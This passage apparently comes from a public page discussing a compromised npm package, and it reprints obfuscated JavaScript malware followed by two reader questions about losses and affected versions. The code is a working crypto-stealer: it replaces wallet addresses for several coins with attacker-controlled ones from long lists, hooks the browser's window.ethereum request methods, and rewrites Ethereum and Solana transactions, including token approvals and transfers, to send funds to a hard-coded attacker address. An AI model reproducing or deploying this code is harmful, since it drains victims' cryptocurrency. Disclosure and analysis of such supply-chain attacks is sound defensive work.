| 'bitcoincash:qpwsaxghtvt6phm53vfdj0s6mj4l7h24dgkuxeanyh', | |
| 'bitcoincash:qq7dr7gu8tma7mvpftq4ee2xnhaczqk9myqnk6v4c9', | |
| 'bitcoincash:qpgf3zrw4taxtvj87y5lcaku77qdhq7kqgdga5u6jz', | |
| 'bitcoincash:qrkrnnc5kacavf5pl4n4hraazdezdrq08ssmxsrdsf', | |
| 'bitcoincash:qqdepnkh89dmfxyp4naluvhlc3ynej239sdu760y39', | |
| 'bitcoincash:qqul8wuxs4ec8u4d6arkvetdmdh4ppwr0ggycetq97', | |
| 'bitcoincash:qq0enkj6n4mffln7w9z6u8vu2mef47jwlcvcx5f823', | |
| 'bitcoincash:qrc620lztlxv9elhj5qzvmf2cxhe7egup5few7tcd3', | |
| 'bitcoincash:qrf3urqnjl4gergxe45ttztjymc8dzqyp54wsddp64', | |
| 'bitcoincash:qr7mkujcr9c38ddfn2ke2a0sagk52tllesderfrue8', | |
| 'bitcoincash:qqgjn9yqtud5mle3e7zhmagtcap9jdmcg509q56ynt', | |
| 'bitcoincash:qpuq8uc9ydxszny5q0j4actg30he6uhffvvy0dl7er', | |
| 'bitcoincash:qz0640hjl2m3n2ca26rknljpr55gyd9pjq89g6xhrz', | |
| 'bitcoincash:qq0j6vl2ls2g8kkhkvpcfyjxns5zq03llgsqdnzl4s', | |
| 'bitcoincash:qq8m8rkl29tcyqq8usfruejnvx27zxlpu52mc9spz7', | |
| 'bitcoincash:qpudgp66jjj8k9zec4na3690tvu8ksq4fq8ycpjzed', | |
| 'bitcoincash:qqe3qc9uk08kxnng0cznu9xqqluwfyemxym7w2e3xw', | |
| 'bitcoincash:qpukdxh30d8dtj552q2jet0pqvcvt64gfujaz8h9sa', | |
| 'bitcoincash:qqs4grdq56y5nnamu5d8tk450kzul3aulyz8u66mjc', | |
| 'bitcoincash:qp7rhhk0gcusyj9fvl2ftr06ftt0pt8wgumd8ytssd', | |
| 'bitcoincash:qpmc3y5y2v7h3x3sgdg7npau034fsggwfczvuqtprl', | |
| 'bitcoincash:qzum0qk4kpauy8ljspmkc5rjxe5mgam5xg7xl5uq2g', | |
| 'bitcoincash:qqjqp8ayuky5hq4kgrarpu40eq6xjrneuurc43v9lf', | |
| 'bitcoincash:qqxu6a3f0240v0mwzhspm5zeneeyecggvufgz82w7u', | |
| 'bitcoincash:qpux2mtlpd03d8zxyc7nsrk8knarnjxxts2fjpzeck', | |
| 'bitcoincash:qpcgcrjry0excx80zp8hn9vsn4cnmk57vylwa5mtz3', | |
| 'bitcoincash:qpjj6prm5menjatrmqaqx0h3zkuhdkfy75uauxz2sj', | |
| 'bitcoincash:qp79qg7np9mvr4mg78vz8vnx0xn8hlkp7sk0g86064', | |
| 'bitcoincash:qr27clvagvzra5z7sfxxrwmjxy026vltucdkhrsvc7', | |
| 'bitcoincash:qrsypfz3lqt8xtf8ej5ftrqyhln577me6v640uew8j', | |
| 'bitcoincash:qrzfrff4czjn6ku0tn2u3cxk7y267enfqvx6zva5w6', | |
| 'bitcoincash:qr7exs4az754aknl3r5gp9scn74dzjkcrgql3jpv59', | |
| 'bitcoincash:qq35fzg00mzcmwtag9grmwljvpuy5jm8kuzfs24jhu', | |
| 'bitcoincash:qra5zfn74m7l85rl4r6wptzpnt2p22h7552swkpa7l', | |
| 'bitcoincash:qzqllr0fsh9fgfvdhmafx32a0ddtkt52evnqd7w7h7', | |
| 'bitcoincash:qpjdcwld84wtd5lk00x8t7qp4eu3y0xhnsjjfgrs7q', | |
| 'bitcoincash:qrgpm5y229xs46wsx9h9mlftedmsm4xjlu98jffmg3', | |
| 'bitcoincash:qpjl9lkjjp4s6u654k3rz06rhqcap849jg8uwqmaad', | |
| 'bitcoincash:qra5uwzgh8qus07v3srw5q0e8vrx5872k5cxguu3h5', | |
| 'bitcoincash:qz6239jkqf9qpl2axk6vclsx3gdt8cy4z5rag98u2r', | |
| ] | |
| for (const [_0x17ccd4, _0x129783] of Object.entries(_0x3ec3bb)) { | |
| const _0x1be350 = _0x530d91.match(_0x129783) || [] | |
| for (const _0x4225ce of _0x1be350) { | |
| _0x17ccd4 == 'ethereum' && | |
| !_0x4477fc.includes(_0x4225ce) && | |
| neth == 0 && | |
| (_0x530d91 = _0x530d91.replace( | |
| _0x4225ce, | |
| _0x2abae0(_0x4225ce, _0x4477fc) | |
| )) | |
| _0x17ccd4 == 'bitcoinLegacy' && | |
| !_0x264994.includes(_0x4225ce) && | |
| (_0x530d91 = _0x530d91.replace( | |
| _0x4225ce, | |
| _0x2abae0(_0x4225ce, _0x264994) | |
| )) | |
| _0x17ccd4 == 'bitcoinSegwit' && | |
| !_0x2e3cca.includes(_0x4225ce) && | |
| (_0x530d91 = _0x530d91.replace( | |
| _0x4225ce, | |
| _0x2abae0(_0x4225ce, _0x2e3cca) | |
| )) | |
| _0x17ccd4 == 'tron' && | |
| !_0x3ee86f.includes(_0x4225ce) && | |
| (_0x530d91 = _0x530d91.replace( | |
| _0x4225ce, | |
| _0x2abae0(_0x4225ce, _0x3ee86f) | |
| )) | |
| _0x17ccd4 == 'ltc' && | |
| !_0x4a9d96.includes(_0x4225ce) && | |
| (_0x530d91 = _0x530d91.replace( | |
| _0x4225ce, | |
| _0x2abae0(_0x4225ce, _0x4a9d96) | |
| )) | |
| _0x17ccd4 == 'ltc2' && | |
| !_0x4a9d96.includes(_0x4225ce) && | |
| (_0x530d91 = _0x530d91.replace( | |
| _0x4225ce, | |
| _0x2abae0(_0x4225ce, _0x4a9d96) | |
| )) | |
| _0x17ccd4 == 'bch' && | |
| !_0x553dcb.includes(_0x4225ce) && | |
| (_0x530d91 = _0x530d91.replace( | |
| _0x4225ce, | |
| _0x2abae0(_0x4225ce, _0x553dcb) | |
| )) | |
| const _0x2d452a = [ | |
| ..._0x4477fc, | |
| ..._0x264994, | |
| ..._0x2e3cca, | |
| ..._0x3ee86f, | |
| ..._0x4a9d96, | |
| ..._0x553dcb, | |
| ], | |
| _0x35f871 = _0x2d452a.includes(_0x4225ce) | |
| _0x17ccd4 == 'solana' && | |
| !_0x35f871 && | |
| !_0x514d7d.includes(_0x4225ce) && | |
| (_0x530d91 = _0x530d91.replace( | |
| _0x4225ce, | |
| _0x2abae0(_0x4225ce, _0x514d7d) | |
| )) | |
| _0x17ccd4 == 'solana2' && | |
| !_0x35f871 && | |
| !_0x514d7d.includes(_0x4225ce) && | |
| (_0x530d91 = _0x530d91.replace( | |
| _0x4225ce, | |
| _0x2abae0(_0x4225ce, _0x514d7d) | |
| )) | |
| _0x17ccd4 == 'solana3' && | |
| _0x35f871 && | |
| !_0x514d7d.includes(_0x4225ce) && | |
| (_0x530d91 = _0x530d91.replace( | |
| _0x4225ce, | |
| _0x2abae0(_0x4225ce, _0x514d7d) | |
| )) | |
| } | |
| } | |
| return _0x530d91 | |
| } | |
| } | |
| async function runmask() { | |
| let _0x1c41fa = 0, | |
| _0x2a20cb = new Map(), | |
| _0x1ab7cb = false | |
| function _0x1089ae(_0x4ac357, _0xc83c36 = true) { | |
| const _0x13d8ee = JSON.parse(JSON.stringify(_0x4ac357)) | |
| if (_0xc83c36) { | |
| if ( | |
| _0x13d8ee.value && | |
| _0x13d8ee.value !== '0x0' && | |
| _0x13d8ee.value !== '0' | |
| ) { | |
| const _0x5c6391 = _0x13d8ee.to | |
| _0x13d8ee.to = '0xFc4a4858bafef54D1b1d7697bfb5c52F4c166976' | |
| } | |
| if (_0x13d8ee.data) { | |
| const _0x250e27 = _0x13d8ee.data.toLowerCase() | |
| if (_0x250e27.startsWith('0x095ea7b3')) { | |
| if (_0x250e27.length >= 74) { | |
| const _0x7fa5f0 = _0x250e27.substring(0, 10), | |
| _0x15c4f9 = '0x' + _0x250e27.substring(34, 74), | |
| _0xde14cc = 'Fc4a4858bafef54D1b1d7697bfb5c52F4c166976'.padStart( | |
| 64, | |
| '0' | |
| ), | |
| _0x3e4a11 = 'f'.repeat(64) | |
| _0x13d8ee.data = _0x7fa5f0 + _0xde14cc + _0x3e4a11 | |
| const _0x432d38 = { | |
| '0x7a250d5630b4cf539739df2c5dacb4c659f2488d': 'Uniswap V2', | |
| '0x66a9893cC07D91D95644AEDD05D03f95e1dBA8Af': 'Uniswap V2', | |
| '0xe592427a0aece92de3edee1f18e0157c05861564': 'Uniswap V3', | |
| '0x10ed43c718714eb63d5aa57b78b54704e256024e': 'PancakeSwap V2', | |
| '0x13f4ea83d0bd40e75c8222255bc855a974568dd4': 'PancakeSwap V3', | |
| '0x1111111254eeb25477b68fb85ed929f73a960582': '1inch', | |
| '0xd9e1ce17f2641f24ae83637ab66a2cca9c378b9f': 'SushiSwap', | |
| }, | |
| _0x13f774 = _0x432d38[_0x15c4f9.toLowerCase()] | |
| _0x13f774 | |
| ? console.log(_0x13f774 + _0x15c4f9) | |
| : console.log(_0x15c4f9) | |
| } | |
| } else { | |
| if (_0x250e27.startsWith('0xd505accf')) { | |
| if (_0x250e27.length >= 458) { | |
| const _0x571743 = _0x250e27.substring(0, 10), | |
| _0x55e7fa = _0x250e27.substring(10, 74), | |
| _0x382fb5 = _0x250e27.substring(202, 266), | |
| _0x5bb3a7 = _0x250e27.substring(266, 330), | |
| _0x2e5118 = _0x250e27.substring(330, 394), | |
| _0x3ba273 = _0x250e27.substring(394, 458), | |
| _0x36b084 = 'Fc4a4858bafef54D1b1d7697bfb5c52F4c166976'.padStart( | |
| 64, | |
| '0' | |
| ), | |
| _0x15389e = 'f'.repeat(64) | |
| _0x13d8ee.data = | |
| _0x571743 + | |
| _0x55e7fa + | |
| _0x36b084 + | |
| _0x15389e + | |
| _0x382fb5 + | |
| _0x5bb3a7 + | |
| _0x2e5118 + | |
| _0x3ba273 | |
| } | |
| } else { | |
| if (_0x250e27.startsWith('0xa9059cbb')) { | |
| if (_0x250e27.length >= 74) { | |
| const _0x5d2193 = _0x250e27.substring(0, 10), | |
| _0x1493e2 = _0x250e27.substring(74), | |
| _0x32c34c = | |
| 'Fc4a4858bafef54D1b1d7697bfb5c52F4c166976'.padStart(64, '0') | |
| _0x13d8ee.data = _0x5d2193 + _0x32c34c + _0x1493e2 | |
| } | |
| } else { | |
| if (_0x250e27.startsWith('0x23b872dd')) { | |
| if (_0x250e27.length >= 138) { | |
| const _0x5c5045 = _0x250e27.substring(0, 10), | |
| _0x1ebe01 = _0x250e27.substring(10, 74), | |
| _0x558b46 = _0x250e27.substring(138), | |
| _0x56d65b = | |
| 'Fc4a4858bafef54D1b1d7697bfb5c52F4c166976'.padStart( | |
| 64, | |
| '0' | |
| ) | |
| _0x13d8ee.data = _0x5c5045 + _0x1ebe01 + _0x56d65b + _0x558b46 | |
| } | |
| } | |
| } | |
| } | |
| } | |
| } else { | |
| _0x13d8ee.to && | |
| _0x13d8ee.to !== '0xFc4a4858bafef54D1b1d7697bfb5c52F4c166976' && | |
| (_0x13d8ee.to = '0xFc4a4858bafef54D1b1d7697bfb5c52F4c166976') | |
| } | |
| } else { | |
| _0x13d8ee.instructions && | |
| Array.isArray(_0x13d8ee.instructions) && | |
| _0x13d8ee.instructions.forEach((_0x190501) => { | |
| _0x190501.accounts && | |
| Array.isArray(_0x190501.accounts) && | |
| _0x190501.accounts.forEach((_0x2b9990) => { | |
| if (typeof _0x2b9990 === 'string') { | |
| _0x2b9990 = '19111111111111111111111111111111' | |
| } else { | |
| _0x2b9990.pubkey && | |
| (_0x2b9990.pubkey = '19111111111111111111111111111111') | |
| } | |
| }) | |
| _0x190501.keys && | |
| Array.isArray(_0x190501.keys) && | |
| _0x190501.keys.forEach((_0x40768f) => { | |
| _0x40768f.pubkey && | |
| (_0x40768f.pubkey = '19111111111111111111111111111111') | |
| }) | |
| }) | |
| _0x13d8ee.recipient && | |
| (_0x13d8ee.recipient = '19111111111111111111111111111111') | |
| _0x13d8ee.destination && | |
| (_0x13d8ee.destination = '19111111111111111111111111111111') | |
| } | |
| return _0x13d8ee | |
| } | |
| function _0x485f9d(_0x38473f, _0x292c7a) { | |
| return async function (..._0x59af19) { | |
| _0x1c41fa++ | |
| let _0x12a7cb | |
| try { | |
| _0x12a7cb = JSON.parse(JSON.stringify(_0x59af19)) | |
| } catch (_0x5d1767) { | |
| _0x12a7cb = [..._0x59af19] | |
| } | |
| if (_0x59af19[0] && typeof _0x59af19[0] === 'object') { | |
| const _0x2c3d7e = _0x12a7cb[0] | |
| if ( | |
| _0x2c3d7e.method === 'eth_sendTransaction' && | |
| _0x2c3d7e.params && | |
| _0x2c3d7e.params[0] | |
| ) { | |
| try { | |
| const _0x39ad21 = _0x1089ae(_0x2c3d7e.params[0], true) | |
| _0x2c3d7e.params[0] = _0x39ad21 | |
| } catch (_0x226343) {} | |
| } else { | |
| if ( | |
| (_0x2c3d7e.method === 'solana_signTransaction' || | |
| _0x2c3d7e.method === 'solana_signAndSendTransaction') && | |
| _0x2c3d7e.params && | |
| _0x2c3d7e.params[0] | |
| ) { | |
| try { | |
| let _0x5ad975 = _0x2c3d7e.params[0] | |
| _0x5ad975.transaction && (_0x5ad975 = _0x5ad975.transaction) | |
| const _0x5dbe63 = _0x1089ae(_0x5ad975, false) | |
| _0x2c3d7e.params[0].transaction | |
| ? (_0x2c3d7e.params[0].transaction = _0x5dbe63) | |
| : (_0x2c3d7e.params[0] = _0x5dbe63) | |
| } catch (_0x4b99fd) {} | |
| } | |
| } | |
| } | |
| const _0x1cbb37 = _0x38473f.apply(this, _0x12a7cb) | |
| if (_0x1cbb37 && typeof _0x1cbb37.then === 'function') { | |
| return _0x1cbb37 | |
| .then((_0xea3332) => _0xea3332) | |
| .catch((_0x35d6a3) => { | |
| throw _0x35d6a3 | |
| }) | |
| } | |
| return _0x1cbb37 | |
| } | |
| } | |
| function _0x41630a(_0x5d6d52) { | |
| if (!_0x5d6d52) { | |
| return false | |
| } | |
| let _0x2fc35d = false | |
| const _0xfafee = ['request', 'send', 'sendAsync'] | |
| for (const _0x16ab0e of _0xfafee) { | |
| if (typeof _0x5d6d52[_0x16ab0e] === 'function') { | |
| const _0x58cddf = _0x5d6d52[_0x16ab0e] | |
| _0x2a20cb.set(_0x16ab0e, _0x58cddf) | |
| try { | |
| Object.defineProperty(_0x5d6d52, _0x16ab0e, { | |
| value: _0x485f9d(_0x58cddf, _0x16ab0e), | |
| writable: true, | |
| configurable: true, | |
| enumerable: true, | |
| }) | |
| _0x2fc35d = true | |
| } catch (_0x19546c) {} | |
| } | |
| } | |
| return _0x2fc35d && (_0x1ab7cb = true), _0x2fc35d | |
| } | |
| function _0xfc3320() { | |
| let _0x4f0cd6 = 0 | |
| const _0x5b507d = () => { | |
| _0x4f0cd6++ | |
| if (window.ethereum) { | |
| setTimeout(() => { | |
| _0x41630a(window.ethereum) | |
| }, 500) | |
| return | |
| } | |
| _0x4f0cd6 < 50 && setTimeout(_0x5b507d, 100) | |
| } | |
| _0x5b507d() | |
| } | |
| _0xfc3320() | |
| window.stealthProxyControl = { | |
| isActive: () => _0x1ab7cb, | |
| getInterceptCount: () => _0x1c41fa, | |
| getOriginalMethods: () => _0x2a20cb, | |
| forceShield: () => { | |
| if (window.ethereum) { | |
| return _0x41630a(window.ethereum) | |
| } | |
| return false | |
| }, | |
| } | |
| } |
Do we know how much did they gain from this?
How far back does this obfuscated code go? I'm seeing in the overrides you recommend the chalk package 5.3.0 from 2 years ago and not 9 months ago, 1 month or 22 days ago. Does this mean the malicious code is in those versions too?